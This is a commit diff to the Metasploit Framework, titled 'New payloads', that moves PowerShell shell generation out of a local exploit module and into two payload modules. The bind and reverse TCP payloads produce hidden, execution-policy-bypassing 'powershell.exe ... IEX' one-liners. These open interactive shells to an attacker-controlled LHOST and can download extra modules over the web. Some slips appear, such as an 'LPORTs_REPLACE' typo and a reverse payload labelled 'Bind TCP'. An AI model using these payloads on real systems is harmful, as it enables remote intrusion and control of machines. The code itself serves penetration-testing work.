New payloads

Author: benpturner

modules/exploits/windows/local/interactive_powershell.rb

@@ -1,4 +1,4 @@
-1##
+##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
@@ -7,8 +7,6 @@
 
 class Metasploit3 < Msf::Exploit::Local
 
-  include Rex::Powershell::Command
-
   def initialize(info = {})
     super(update_info(info,
       'Name'                 => "Windows Local Interactive Powershell Session",
@@ -47,61 +45,37 @@ def initialize(info = {})
       'DefaultTarget'  => 0
     ))
 
-    register_options(
-      [
-        Opt::LPORT(4444),
-        OptString.new('LOAD_MODULES', [false, 'A list of powershell modules seperated by a comma to download over the Internet', nil])
-      ], self.class)
   end
 
   def exploit
+    rhost = datastore['RHOST']
+    lhost = datastore['LHOST']
     lport = datastore['LPORT']
+    payload = datastore['PAYLOAD']
 
-    if datastore['RHOST'].to_s.empty?
-      rhost = session.session_host
-    else
-      rhost = datastore['RHOST']
-    end
-
-    template_path = File.join(
-      Msf::Config.data_directory,
-      'exploits',
-      'powershell',
-      'powerfun.ps1')
-
-    script_in = File.read(template_path)
+    # sysinfo is only on meterpreter sessions
+    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
-    if datastore['LHOST'].to_s.empty?
-      script_in << "\npowerfun -Command bind"
-    else
-      lhost = datastore['LHOST']
-      script_in << "\npowerfun -Command reverse"
-    end
-
-    mods = ''
-
-    if datastore['LOAD_MODULES']
-      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
-      mods_array.collect(&:strip)
-      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
-      mods_array.each {|m| vprint_good " #{m}"}
-      mods = "\"#{mods_array.join("\",\n\"")}\""
-      script_in << " -Download true\n"
+    # Check that the payload is a Windows one and on the list
+    if not  session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
+      print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
+      return
     end
 
-    script_in.gsub!('MODULES_REPLACE', mods)
-    script_in.gsub!('LPORT_REPLACE', lport.to_s)
-    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
-    script = Rex::Powershell::Command.compress_script(script_in)
-
-    res = session.sys.process.execute("powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})", nil, 'Hidden' => true, 'Channelized' => false)
+    pay = client.framework.payloads.create(payload)
+    pay.datastore['LHOST'] = lhost
+    pay.datastore['LPORT'] = lport
+    pay.datastore['RHOST'] = rhost
+    
+    raw = pay.generate
+    res = session.sys.process.execute("#{raw}", nil, 'Hidden' => true, 'Channelized' => false)
     fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
     computer_name = session.sys.config.sysinfo['Computer']
     vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
 
     if datastore['LHOST'].to_s.empty?
       print_status("Attemping to connect to #{rhost}:#{lport}...")
-      ctimeout = 30
+      ctimeout = 10
       stime = Time.now.to_i
       last_error = nil
 

modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb

@@ -4,23 +4,28 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/find_shell'
 require 'msf/base/sessions/powershell'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
   CachedSize = 0
 
   include Msf::Payload::Single
-  include Msf::Sessions::CommandShellOptions
+  include Rex::Powershell::Command
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Bind Powershell, Interact with Established Connection',
-      'Description'   => 'Interacts with a powershell session on an established socket connection',
-      'Author'        => 'hdm',
+      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
+      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'windows',
       'Arch'          => ARCH_CMD,
@@ -34,6 +39,40 @@ def initialize(info = {})
           'Payload' => ''
         }
       ))
+      register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+  end
+
+  def generate
+    lport = datastore['LPORT']
+
+    template_path = File.join(
+    Msf::Config.data_directory,
+    'exploits',
+    'powershell',
+    'powerfun.ps1')
+
+    script_in = File.read(template_path)
+    script_in << "\npowerfun -Command bind"
+
+    mods = ''
+
+    if datastore['LOAD_MODULES']
+      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+      mods_array.collect(&:strip)
+      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      mods_array.each {|m| vprint_good " #{m}"}
+      mods = "\"#{mods_array.join("\",\n\"")}\""
+      script_in << " -Download true\n"
+    end
+
+    script_in.gsub!('MODULES_REPLACE', mods)
+    script_in.gsub!('LPORTs_REPLACE', lport.to_s)
+
+    script = Rex::Powershell::Command.compress_script(script_in)
+    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
   end
 
 end

modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb

@@ -4,23 +4,28 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/find_shell'
 require 'msf/base/sessions/powershell'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
   CachedSize = 0
 
   include Msf::Payload::Single
-  include Msf::Sessions::CommandShellOptions
+  include Rex::Powershell::Command
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Reverse Powershell, Interact with Established Connection',
+      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
       'Description'   => 'Interacts with a powershell session on an established socket connection',
-      'Author'        => 'hdm',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'windows',
       'Arch'          => ARCH_CMD,
@@ -34,6 +39,42 @@ def initialize(info = {})
           'Payload' => ''
         }
       ))
+      register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+  end
+
+  def generate
+    lport = datastore['LPORT']
+    lhost = datastore['LHOST']
+
+    template_path = File.join(
+    Msf::Config.data_directory,
+    'exploits',
+    'powershell',
+    'powerfun.ps1')
+
+    script_in = File.read(template_path)
+    script_in << "\npowerfun -Command reverse"
+
+    mods = ''
+
+    if datastore['LOAD_MODULES']
+      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+      mods_array.collect(&:strip)
+      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      mods_array.each {|m| vprint_good " #{m}"}
+      mods = "\"#{mods_array.join("\",\n\"")}\""
+      script_in << " -Download true\n"
+    end
+
+    script_in.gsub!('MODULES_REPLACE', mods)
+    script_in.gsub!('LPORT_REPLACE', lport.to_s)
+    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
+
+    script = Rex::Powershell::Command.compress_script(script_in)
+    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
   end
 
 end